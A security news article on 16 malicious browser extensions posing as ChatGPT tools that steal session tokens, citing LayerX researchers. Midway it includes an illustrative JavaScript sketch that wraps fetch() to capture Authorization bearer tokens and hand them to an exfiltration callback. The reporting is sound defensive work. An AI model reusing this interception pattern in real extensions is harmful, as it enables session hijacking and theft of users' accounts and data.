More than a dozen malicious Chrome browser extensions posing as ChatGPT productivity tools are being used by threat actors to steal users’ credentials, continuing a trend of extensions being used to attack AI users.
Researchers with startup LayerX Security found 16 such malicious extensions that were created by the same bad actor, a move designed to reach as many victims as possible.
The extensions use a common mechanism to intercept ChatGPT session authentication tokens, which are then sent to a third-party backend, according to LayerX security researcher Natalie Zargarov. The tokens provide the same account-level access that the users themselves have, including to conversation histories and metadata.
“As a result, attackers can replicate the users’ access credentials to ChatGPT and impersonate them, allowing them to access all of the user’s ChatGPT conversations, data, or code,” Zargarov wrote in a report this week. “While these extensions do not exploit vulnerabilities in ChatGPT itself, their design enables session hijacking and covert account access, representing a significant security and privacy risk.”
The discovery of the malicious Chrome extensions highlights an ongoing threat to AI users going back several years that has come to the fore over the past several months. Among the latest examples is OX Security’s detection of two such extensions that had been downloaded more than 900,000 times and were used to steal browsing data and conversations with AI models such as ChatGPT and DeepSeek.
There also is the ongoing GhostPoster campaign that was first reported by Koi Security in December 2025 and involves a malicious Firefox extension. LayerX researchers reported earlier this month that, despite the campaign being exposed, they found 17 more such malicious extensions that collectively were downloaded more than 840,000 times, and that some had been active for more than five years.
The latest Chrome extensions were downloaded about 900 times, which Zargarov admitted is a “drop in the bucket” when compared with GhostPoster and other such campaigns. However, it fits with the growing trend of bad actors using such malicious extensions.
“This campaign coincides with a broader trend: the rapid growth in adoption of AI-powered browser extensions, aimed at helping users with their everyday productivity needs,” she wrote. “Many of these extensions mimic known brands to gain users’ trust, particularly those designed to enhance interaction with large language models. As these extensions increasingly require deep integration with authenticated web applications, they introduce a materially expanded browser attack surface.”
LayerX co-founder and CEO Or Eshed wrote about the threat from malicious browser extensions in November, noting that because most enterprise work happens in the browser, so do employee actions, from launching SaaS apps to invoking generative AI tools and pasting in prompts. Still, most traditional security stacks, such as data loss prevention (DLP), endpoint detection and response (EDR), and security service edge (SSE), lack visibility into the browser.
“That blind spot is where data leakage, credential theft, and AI-enabled risks now converge and where many of today’s most sophisticated breaches begin,” Eshed wrote.
The number of downloads in the latest campaign may be relatively small, but the scope of the attack shows its relevance, and it’s not the only indicator. Such GPT optimizers are popular, and the large number of highly rated legitimate ones in the Chrome Web Store makes it easier for users to miss the warning signs, Zargarov wrote. One of the extension’s variants has a “featured” status, which gives it an added veneer of legitimacy.
“It just takes one iteration for a malicious extension to become popular,” she wrote. “We believe that GPT optimizers will soon become as popular as (not more than) VPN extensions, which is why we prioritized the publication of this analysis. Our goal is to shut it down BEFORE it hits critical mass.”
She noted that in all but one of the extensions’ iterations, the workflow is the same: a content script is injected into chatgpt.com and observes outbound requests initiated by the ChatGPT web app. The session token is extracted from requests containing an authorization header, and a second script receives the message and transmits the token to a remote server.
“This approach allows the extension operator to authenticate to ChatGPT services using the victim’s active session and obtain all users’ history chats and connectors (the users’ Google Drive, Slack, GitHub and other sensitive data sources),” Zargarov wrote.
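In rough terms, the interception pattern Zargarov describes can be sketched as follows. This is an illustrative reconstruction, not LayerX’s published analysis or the actual extension code; `patchFetch` and the `exfiltrate` callback are hypothetical names for the header-reading and upload steps:

```javascript
// Illustrative sketch only: how an injected content script could wrap
// the page's fetch() so that every outbound request's Authorization
// header passes through attacker-controlled code.
function patchFetch(target, exfiltrate) {
  const originalFetch = target.fetch;
  target.fetch = function (input, init = {}) {
    // Read the Authorization header, if the web app attached one.
    const headers = new Map(Object.entries(init.headers || {}));
    const auth = headers.get("Authorization") || headers.get("authorization");
    if (auth && auth.startsWith("Bearer ")) {
      // In the malicious variants, the captured session token is
      // relayed to a remote, attacker-controlled backend.
      exfiltrate(auth);
    }
    // Pass the request through unchanged so the user notices nothing.
    return originalFetch.call(target, input, init);
  };
}

// Demonstration against a stand-in page object (no real network use).
const captured = [];
const fakePage = { fetch: async () => ({ ok: true }) };
patchFetch(fakePage, (token) => captured.push(token));
fakePage.fetch("https://chatgpt.com/backend-api/conversations", {
  headers: { Authorization: "Bearer sess-abc123" },
});
```

Because the wrapper forwards every request to the original `fetch`, the ChatGPT web app behaves normally, which is why, as the report notes, no vulnerability in ChatGPT itself is required.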
There are several indications that all the extensions are part of a single and coordinated campaign, such as a shared code base, consistent publisher characteristics, and highly similar icons, branding, and descriptions.
Fifteen of the 16 extensions are distributed through the Chrome Web Store, while one was published through the Microsoft Edge add-ons market.
“This research highlights how browser extensions targeting AI platforms can be leveraged to achieve account-level access through legitimate session mechanisms, without exploiting vulnerabilities or deploying overt malware,” Zargarov wrote. “As AI platforms continue to be integrated into enterprise and personal workflows, browser extensions interacting with authenticated AI services should be treated as high-risk software and subjected to rigorous scrutiny.”